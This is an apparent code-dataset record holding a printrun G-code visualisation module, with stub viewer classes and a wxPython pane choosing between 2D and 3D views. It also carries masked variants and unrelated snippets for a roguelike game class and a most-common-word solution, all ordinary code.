self.p = NoViz()
def Destroy(self):
pass
class VizPane(wx.BoxSizer):
def __init__(self, root, parentpanel=None):
super(VizPane, self).__init__(wx.VERTICAL)
if not parentpanel:
parentpanel = root.panel
if root.settings.mainviz == 'None':
root.gviz = NoViz()
root.gwindow = NoVizWindow()
return
use2dview = root.settings.mainviz == '2D'
if root.settings.mainviz == '3D':
try:
import printrun.gcview
root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,
root.build_dimensions_list, root=root, circular=root.
settings.circular_bed, antialias_samples=int(root.
settings.antialias3dsamples))
root.gviz.clickcb = root.show_viz_window
except:
use2dview = True
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if use2dview:
from printrun import gviz
root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions
=root.build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gviz.SetToolTip(wx.ToolTip(_(
'Click to examine / edit\n layers of loaded file')))
root.gviz.showall = 1
root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)
use3dview = root.settings.viz3d
if use3dview:
try:
import printrun.gcview
objects = None
if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):
objects = root.gviz.objects
root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.
ID_ANY,
'Gcode view, shift to move view, mousewheel to set layer',
size=(600, 600), build_dimensions=root.
build_dimensions_list, objects=objects, root=root,
circular=root.settings.circular_bed, antialias_samples=
int(root.settings.antialias3dsamples))
except:
use3dview = False
logging.error(
'3D view mode requested, but we failed to initialize it.\n'
+
"""Falling back to 2D view, and here is the backtrace:
"""
+ traceback.format_exc())
if not use3dview:
from printrun import gviz
root.gwindow = gviz.GvizWindow(build_dimensions=root.
build_dimensions_list, grid=(root.settings.
preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width=root.settings.preview_extrusion_width,
bgcolor=root.bgcolor)
root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())
if not isinstance(root.gviz, NoViz):
self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.
ALIGN_CENTER_HORIZONTAL)
<|reserved_special_token_1|>
# This file is part of the printrun suite.
#
# printrun is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# printrun is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with printrun. If not, see <http://www.gnu.org/licenses/>.
import traceback
import logging
import wx
class NoViz:
showall = False
def clear(self, *a):
pass
def addfile_perlayer(self, gcode, showall = False):
layer_idx = 0
while layer_idx < len(gcode.all_layers):
yield layer_idx
layer_idx += 1
yield None
def addfile(self, *a, **kw):
pass
def addgcode(self, *a, **kw):
pass
def addgcodehighlight(self, *a, **kw):
pass
def Refresh(self, *a):
pass
def setlayer(self, *a):
pass
class NoVizWindow:
def __init__(self):
self.p = NoViz()
def Destroy(self):
pass
class VizPane(wx.BoxSizer):
def __init__(self, root, parentpanel = None):
super(VizPane, self).__init__(wx.VERTICAL)
if not parentpanel: parentpanel = root.panel
if root.settings.mainviz == "None":
root.gviz = NoViz()
root.gwindow = NoVizWindow()
return
use2dview = root.settings.mainviz == "2D"
if root.settings.mainviz == "3D":
try:
import printrun.gcview
root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel, root.build_dimensions_list, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))
root.gviz.clickcb = root.show_viz_window
except:
use2dview = True
logging.error("3D view mode requested, but we failed to initialize it.\n"
+ "Falling back to 2D view, and here is the backtrace:\n"
+ traceback.format_exc())
if use2dview:
from printrun import gviz
root.gviz = gviz.Gviz(parentpanel, (300, 300),
build_dimensions = root.build_dimensions_list,
grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width = root.settings.preview_extrusion_width,
bgcolor = root.bgcolor)
root.gviz.SetToolTip(wx.ToolTip(_("Click to examine / edit\n layers of loaded file")))
root.gviz.showall = 1
root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)
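        # the detached G-code window: prefer the 3D frame, fall back to the 2D GvizWindow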
use3dview = root.settings.viz3d
if use3dview:
try:
import printrun.gcview
objects = None
if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):
objects = root.gviz.objects
root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.ID_ANY, 'Gcode view, shift to move view, mousewheel to set layer', size = (600, 600), build_dimensions = root.build_dimensions_list, objects = objects, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))
except:
use3dview = False
logging.error("3D view mode requested, but we failed to initialize it.\n"
+ "Falling back to 2D view, and here is the backtrace:\n"
+ traceback.format_exc())
if not use3dview:
from printrun import gviz
root.gwindow = gviz.GvizWindow(build_dimensions = root.build_dimensions_list,
grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width = root.settings.preview_extrusion_width,
bgcolor = root.bgcolor)
root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())
if not isinstance(root.gviz, NoViz):
self.Add(root.gviz.widget, 1, flag = wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL)
|
flexible
|
{
"blob_id": "3cc473f6bb4b2e1dd806edb8b096a6118fe7056a",
"index": 7202,
"step-1": "<mask token>\n\n\nclass NoViz:\n <mask token>\n <mask token>\n <mask token>\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n <mask token>\n <mask token>\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-2": "<mask token>\n\n\nclass NoViz:\n <mask token>\n <mask token>\n <mask token>\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n <mask token>\n\n def setlayer(self, *a):\n pass\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-3": "<mask token>\n\n\nclass NoViz:\n <mask token>\n\n def clear(self, *a):\n pass\n <mask token>\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n <mask token>\n\n def setlayer(self, *a):\n pass\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-4": "import traceback\nimport logging\nimport wx\n\n\nclass NoViz:\n showall = False\n\n def clear(self, *a):\n pass\n\n def addfile_perlayer(self, gcode, showall=False):\n layer_idx = 0\n while layer_idx < len(gcode.all_layers):\n yield layer_idx\n layer_idx += 1\n yield None\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n\n def Refresh(self, *a):\n pass\n\n def setlayer(self, *a):\n pass\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-5": "# This file is part of the printrun suite.\n#\n# printrun is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# printrun is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with printrun. If not, see <http://www.gnu.org/licenses/>.\n\nimport traceback\nimport logging\n\nimport wx\n\nclass NoViz:\n\n showall = False\n\n def clear(self, *a):\n pass\n\n def addfile_perlayer(self, gcode, showall = False):\n layer_idx = 0\n while layer_idx < len(gcode.all_layers):\n yield layer_idx\n layer_idx += 1\n yield None\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n\n def Refresh(self, *a):\n pass\n\n def setlayer(self, *a):\n pass\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel = None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel: parentpanel = root.panel\n if root.settings.mainviz == \"None\":\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == \"2D\"\n if root.settings.mainviz == \"3D\":\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel, root.build_dimensions_list, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\"3D view mode requested, but we failed to initialize it.\\n\"\n + \"Falling back to 2D view, and here is the backtrace:\\n\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300),\n build_dimensions = root.build_dimensions_list,\n grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width = root.settings.preview_extrusion_width,\n bgcolor = root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\"Click to examine / edit\\n layers of loaded file\")))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.ID_ANY, 'Gcode view, shift to move view, mousewheel to set layer', size = (600, 600), build_dimensions = root.build_dimensions_list, objects = objects, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\"3D view mode requested, but we failed to initialize it.\\n\"\n + \"Falling back to 2D view, and here is the backtrace:\\n\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions = root.build_dimensions_list,\n grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width = 
root.settings.preview_extrusion_width,\n bgcolor = root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag = wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL)\n",
"step-ids": [
9,
10,
11,
15,
16
]
}
|
[
9,
10,
11,
15,
16
] |
from . import utils
from . import objects
START = (0, 0)
STARTING_LIFE = 10
WHITE = (255, 255, 255)
class RoughLightGame:
def __init__(self, game_map, width, height, **kwargs):
self.map = game_map
self.width = width
self.height = height
self.objects = kwargs.get('objects', list())
self.start = kwargs.get('start', utils.Vector(0, 0))
# player initialization
self.player = kwargs.get('player', None)
if not self.player:
self.player = objects.Player(self.start, b'@', WHITE,
self.map, STARTING_LIFE, fov=20)
self.objects.append(self.player)
# Add room lables to map
count = 0
for room in self.map.rooms:
label = objects.Object(room.get_center(), chr(ord('a')+count), WHITE, True, False)
self.objects.append(label)
count += 1
def is_blocked(self, location):
if self.map[location].blocks:
return True
return any(object.location == location and object.blocks for object in self.objects)
def visible_objects(self):
res = []
for object in self.objects:
if object.visible and object.location in self.player.seen:
if self.map.in_area(self.width, self.height, object.location, self.player.location):
res.append(object)
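        # reverse the insertion order so the player, added first, comes out last (presumably drawn on top)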
return reversed(res)
def move_player(self, direction):
if not self.is_blocked(self.player.location + direction):
self.player.move(direction)
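    # note: this second is_blocked definition replaces the identical-purpose one defined above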
def is_blocked(self, location):
if self.map[location].blocks:
return True
return any(object.blocks and object.location == location for object in self.objects)
def get_area(self, width, height):
# Get the current area the player is in based on desired size and players location
return self.map.get_area(width, height, self.player.location)
|
normal
|
{
"blob_id": "5f089c3e67452fe6d14f96a70d792bc0d056b375",
"index": 9227,
"step-1": "<mask token>\n\n\nclass RoughLightGame:\n\n def __init__(self, game_map, width, height, **kwargs):\n self.map = game_map\n self.width = width\n self.height = height\n self.objects = kwargs.get('objects', list())\n self.start = kwargs.get('start', utils.Vector(0, 0))\n self.player = kwargs.get('player', None)\n if not self.player:\n self.player = objects.Player(self.start, b'@', WHITE, self.map,\n STARTING_LIFE, fov=20)\n self.objects.append(self.player)\n count = 0\n for room in self.map.rooms:\n label = objects.Object(room.get_center(), chr(ord('a') + count),\n WHITE, True, False)\n self.objects.append(label)\n count += 1\n <mask token>\n <mask token>\n\n def move_player(self, direction):\n if not self.is_blocked(self.player.location + direction):\n self.player.move(direction)\n <mask token>\n\n def get_area(self, width, height):\n return self.map.get_area(width, height, self.player.location)\n",
"step-2": "<mask token>\n\n\nclass RoughLightGame:\n\n def __init__(self, game_map, width, height, **kwargs):\n self.map = game_map\n self.width = width\n self.height = height\n self.objects = kwargs.get('objects', list())\n self.start = kwargs.get('start', utils.Vector(0, 0))\n self.player = kwargs.get('player', None)\n if not self.player:\n self.player = objects.Player(self.start, b'@', WHITE, self.map,\n STARTING_LIFE, fov=20)\n self.objects.append(self.player)\n count = 0\n for room in self.map.rooms:\n label = objects.Object(room.get_center(), chr(ord('a') + count),\n WHITE, True, False)\n self.objects.append(label)\n count += 1\n <mask token>\n <mask token>\n\n def move_player(self, direction):\n if not self.is_blocked(self.player.location + direction):\n self.player.move(direction)\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n return any(object.blocks and object.location == location for object in\n self.objects)\n\n def get_area(self, width, height):\n return self.map.get_area(width, height, self.player.location)\n",
"step-3": "<mask token>\n\n\nclass RoughLightGame:\n\n def __init__(self, game_map, width, height, **kwargs):\n self.map = game_map\n self.width = width\n self.height = height\n self.objects = kwargs.get('objects', list())\n self.start = kwargs.get('start', utils.Vector(0, 0))\n self.player = kwargs.get('player', None)\n if not self.player:\n self.player = objects.Player(self.start, b'@', WHITE, self.map,\n STARTING_LIFE, fov=20)\n self.objects.append(self.player)\n count = 0\n for room in self.map.rooms:\n label = objects.Object(room.get_center(), chr(ord('a') + count),\n WHITE, True, False)\n self.objects.append(label)\n count += 1\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n return any(object.location == location and object.blocks for object in\n self.objects)\n <mask token>\n\n def move_player(self, direction):\n if not self.is_blocked(self.player.location + direction):\n self.player.move(direction)\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n return any(object.blocks and object.location == location for object in\n self.objects)\n\n def get_area(self, width, height):\n return self.map.get_area(width, height, self.player.location)\n",
"step-4": "<mask token>\nSTART = 0, 0\nSTARTING_LIFE = 10\nWHITE = 255, 255, 255\n\n\nclass RoughLightGame:\n\n def __init__(self, game_map, width, height, **kwargs):\n self.map = game_map\n self.width = width\n self.height = height\n self.objects = kwargs.get('objects', list())\n self.start = kwargs.get('start', utils.Vector(0, 0))\n self.player = kwargs.get('player', None)\n if not self.player:\n self.player = objects.Player(self.start, b'@', WHITE, self.map,\n STARTING_LIFE, fov=20)\n self.objects.append(self.player)\n count = 0\n for room in self.map.rooms:\n label = objects.Object(room.get_center(), chr(ord('a') + count),\n WHITE, True, False)\n self.objects.append(label)\n count += 1\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n return any(object.location == location and object.blocks for object in\n self.objects)\n\n def visible_objects(self):\n res = []\n for object in self.objects:\n if object.visible and object.location in self.player.seen:\n if self.map.in_area(self.width, self.height, object.\n location, self.player.location):\n res.append(object)\n return reversed(res)\n\n def move_player(self, direction):\n if not self.is_blocked(self.player.location + direction):\n self.player.move(direction)\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n return any(object.blocks and object.location == location for object in\n self.objects)\n\n def get_area(self, width, height):\n return self.map.get_area(width, height, self.player.location)\n",
"step-5": "from . import utils\nfrom . import objects\n\nSTART = (0, 0)\nSTARTING_LIFE = 10\n\nWHITE = (255, 255, 255)\n\nclass RoughLightGame:\n\n def __init__(self, game_map, width, height, **kwargs):\n\n self.map = game_map\n self.width = width\n self.height = height\n\n self.objects = kwargs.get('objects', list())\n self.start = kwargs.get('start', utils.Vector(0, 0))\n\n # player initialization\n self.player = kwargs.get('player', None)\n if not self.player:\n self.player = objects.Player(self.start, b'@', WHITE,\n self.map, STARTING_LIFE, fov=20)\n\n self.objects.append(self.player)\n\n # Add room lables to map\n count = 0\n for room in self.map.rooms:\n label = objects.Object(room.get_center(), chr(ord('a')+count), WHITE, True, False)\n self.objects.append(label)\n count += 1\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n\n return any(object.location == location and object.blocks for object in self.objects)\n\n\n def visible_objects(self):\n res = []\n for object in self.objects:\n if object.visible and object.location in self.player.seen:\n if self.map.in_area(self.width, self.height, object.location, self.player.location):\n res.append(object)\n return reversed(res)\n \n\n def move_player(self, direction):\n if not self.is_blocked(self.player.location + direction):\n self.player.move(direction)\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n\n return any(object.blocks and object.location == location for object in self.objects)\n\n def get_area(self, width, height):\n # Get the current area the player is in based on desired size and players location\n return self.map.get_area(width, height, self.player.location)\n\n\n",
"step-ids": [
4,
5,
6,
8,
10
]
}
|
[
4,
5,
6,
8,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def mostCommonWord(self, paragraph, banned):
"""
:type paragraph: str
:type banned: List[str]
:rtype: str
"""
import re
from collections import Counter
paragraph = re.sub('[\\W]', ' ', paragraph)
words = paragraph.strip().split()
words = map(str.lower, words)
cnt = Counter(words)
for word, _ in cnt.most_common():
if word not in banned:
return word
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def mostCommonWord(self, paragraph, banned):
"""
:type paragraph: str
:type banned: List[str]
:rtype: str
"""
import re
from collections import Counter
paragraph = re.sub('[\\W]', ' ', paragraph)
words = paragraph.strip().split()
words = map(str.lower, words)
cnt = Counter(words)
for word, _ in cnt.most_common():
if word not in banned:
return word
if __name__ == '__main__':
paragraph = 'a, a, a, a, b,b,b,c, c'
banned = ['a']
sol = Solution()
print(sol.mostCommonWord(paragraph, banned))
<|reserved_special_token_1|>
"""
corner cases like:
word[!?',;.]
word[!?',;.]word[!?',;.]word
so don't assume punctuation appears only after a single word and is always followed by whitespace

use re for regular expression matching,
replace punctuation, and split words
"""
class Solution:
def mostCommonWord(self, paragraph, banned):
"""
:type paragraph: str
:type banned: List[str]
:rtype: str
"""
# def filterpunc(word):
# word = word.lower()
# for p in "!?',;.":
# word = word.strip(p)
# if word in banned:
# return ''
# return word
# from collections import Counter
# banned = set(banned)
# words = paragraph.strip().split()
# # words = list(filter(lambda x: not any(map(lambda y: y in x, list("!?',;."))), words))
# words = list(filter(lambda x: x not in "!?',;.", words))
# words = map(filterpunc, words)
# words = filter(None, words)
# return Counter(words).most_common(1)[0][0]
import re
from collections import Counter
paragraph = re.sub('[\W]', ' ', paragraph)
words = paragraph.strip().split()
words = map(str.lower, words)
cnt = Counter(words)
for word,_ in cnt.most_common():
if word not in banned:
return word
if __name__ == "__main__":
# paragraph = "Bob hit a ball, the hit BALL flew far after it was hit."
# banned = ["hit"]
# paragraph = "Bob. hIt, baLl"
# banned = ["bob", "hit"]
paragraph = "a, a, a, a, b,b,b,c, c"
banned = ['a']
sol = Solution()
print(sol.mostCommonWord(paragraph, banned))
|
flexible
|
{
